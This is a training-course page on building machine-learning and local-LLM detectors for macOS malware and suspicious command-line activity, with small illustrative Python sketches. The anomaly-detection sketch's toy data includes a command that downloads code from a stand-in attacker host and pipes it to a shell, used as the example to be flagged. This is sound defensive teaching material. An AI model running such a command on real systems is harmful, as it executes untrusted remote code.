
AI for Mac Security
A hands-on introduction to building native machine-learning models and AI tools to protect macOS.
Training overview
Mac security is evolving fast, and Apple Silicon opens the door to native machine learning like never before. This three-day, hands-on course gives security professionals the skills to build and deploy fast, local ML models directly on their MacBooks.

Designed for beginners and intermediate practitioners, the course requires only a basic understanding of scripting and threat hunting. No prior machine learning experience is needed.

You’ll apply both traditional ML techniques and large language models (LLMs) to real-world macOS challenges, from classifying malware to detecting suspicious command-line activity. Along the way, you’ll optimize performance for Apple Silicon and integrate your models into native tooling across the macOS ecosystem.

When
October 12-14, 2025
Details
Day 1 – Foundation and Malware Detection
We start by setting up your Mac with the core tools needed for machine learning and macOS binary analysis. With your environment ready, you’ll explore how Mac applications are structured and how to extract meaningful features from them.

From there, we shift into building a labeled dataset. You’ll gather real-world malware samples, clean and organize your data, and prepare it for training. Through hands-on labs, you’ll gain practical experience working with binary data and applying supervised machine learning to detect malicious files.

By the end of the day, you’ll have trained your first detection model and learned how to evaluate its performance using metrics that matter.
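To give a flavor of the Day 1 workflow, here is a minimal sketch of training and evaluating a supervised detector. The feature names and sample values are invented for illustration (they are not course data), and scikit-learn stands in for whatever stack the labs use:

```python
# Hypothetical static features per binary: [file_size_kb, num_imports, entropy, is_signed]
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import precision_score, recall_score

X = [
    [120, 45, 6.1, 1], [300, 12, 7.8, 0], [80, 60, 5.9, 1],
    [250, 8, 7.9, 0], [150, 50, 6.0, 1], [400, 5, 7.7, 0],
    [90, 55, 5.8, 1], [310, 10, 7.6, 0],
]
y = [0, 1, 0, 1, 0, 1, 0, 1]  # 0 = benign, 1 = malicious (toy labels)

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=42, stratify=y)

clf = RandomForestClassifier(n_estimators=50, random_state=42)
clf.fit(X_train, y_train)
preds = clf.predict(X_test)

# "Metrics that matter" for detection: precision and recall rather than raw
# accuracy, because real malware datasets are heavily imbalanced.
print("precision:", precision_score(y_test, preds))
print("recall:", recall_score(y_test, preds))
```

The same fit/predict/score loop applies regardless of which classifier or feature set the labs settle on.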
Day 2 – Code Behavior and Endpoint Visibility
Day 2 pushes deeper into feature engineering by examining what software actually does. You’ll extract behavioral signals from Mac binaries and use them to train more expressive machine learning models. With hands-on guidance, you’ll convert your models to run locally using Apple’s Core ML format and test their performance on Apple Silicon.

In the afternoon, the focus shifts to live system activity. You’ll work with macOS process data using the Endpoint Security Framework, capturing how applications behave at runtime. You’ll clean and prepare real-world command histories for analysis and apply unsupervised techniques to spot unusual patterns across users and systems.
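The unsupervised idea from the afternoon can be sketched without any ML library at all: score each command by how rare it is across the fleet, so one-off activity stands out. The command histories below are invented for illustration:

```python
# Rarity-based anomaly scoring over command histories (toy data).
from collections import Counter
import math

histories = {
    "alice": ["ls", "git status", "ls", "make", "git status"],
    "bob":   ["ls", "make", "ls", "git status", "make"],
    "carol": ["ls", "git status", "curl http://evil.example/x | sh", "ls"],
}

# Frequency of each command across all users.
counts = Counter(cmd for cmds in histories.values() for cmd in cmds)
total = sum(counts.values())

def surprise(cmd):
    """Self-information in bits: the rarer the command, the higher the score."""
    return -math.log2(counts[cmd] / total)

# Flag the most surprising command per user.
for user, cmds in histories.items():
    top = max(cmds, key=surprise)
    print(f"{user}: {top!r} ({surprise(top):.1f} bits)")
```

Real pipelines replace the toy counter with richer features (arguments, parent process, time of day), but the core move is the same: model what is normal, then rank deviations.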
Day 3 – Language Models and Security Agents
Day 3 introduces large language models as a new lens for understanding command-line and process activity. You’ll start with the fundamentals: how LLMs work, how to run them locally, and how to shape their output through prompt engineering.

Next, you’ll build a semantic detector that uses a GPT-style model to flag suspicious or malicious behavior based on process context. Instead of relying on signatures or patterns, this approach evaluates intent and meaning.

In the final module, you’ll extend that detector into a team of lightweight security agents. These agents help you triage alerts, investigate related activity, and perform threat research, all using natural language interfaces. You’ll leave with a powerful new workflow that blends automation with human insight.
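The semantic-detector pattern can be sketched as: wrap process context in a prompt, send it to a locally hosted model, and parse a constrained verdict. The endpoint, model name, and one-word verdict format below are assumptions (Ollama’s REST API is used as a stand-in), not the course’s exact setup:

```python
# Sketch: prompt a local LLM to judge a process event (assumed Ollama endpoint).
import json
import urllib.request

PROMPT_TEMPLATE = """You are a macOS security analyst. Given this process
event, answer with exactly one word: BENIGN or SUSPICIOUS.

parent: {parent}
command: {command}
"""

def build_prompt(parent, command):
    return PROMPT_TEMPLATE.format(parent=parent, command=command)

def parse_verdict(text):
    """Map the model's free-form reply to a boolean 'suspicious' flag."""
    return "SUSPICIOUS" in text.upper()

def classify(parent, command, url="http://localhost:11434/api/generate"):
    """Query a local model via Ollama's generate API for a verdict."""
    body = json.dumps({
        "model": "llama3",  # assumed local model name
        "prompt": build_prompt(parent, command),
        "stream": False,
    }).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        reply = json.load(resp)["response"]
    return parse_verdict(reply)

# Offline demo of the parsing step (no model required):
print(parse_verdict("SUSPICIOUS: curl piped to sh from a Word macro"))
```

Constraining the output format in the prompt is what makes the reply machine-parseable; the agent layer on top of this is essentially the same call with tool use and memory added.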
Cost
$2,000
Cost does not include a conference ticket. Please register for the conference separately!
Cancellation:
Cancellations up to a month before the training (by Sept. 12, 2025) will be refunded in full (minus any payment processing fees).
Cancellations less than a month before will be refunded at half rate (minus any payment processing fees).
About the trainer
Dr. Kimo Bumanglag is a Member of Technical Staff at OpenAI focused on threat hunting and intelligence. He also serves as an adjunct lecturer at Johns Hopkins University, where he’s committed to making complex cybersecurity topics accessible and mentoring the next generation of security professionals. In addition, he spent years training people for the NSA, US Marine Corps, and US Air Force in offensive and defensive cyber operations.
© All rights reserved.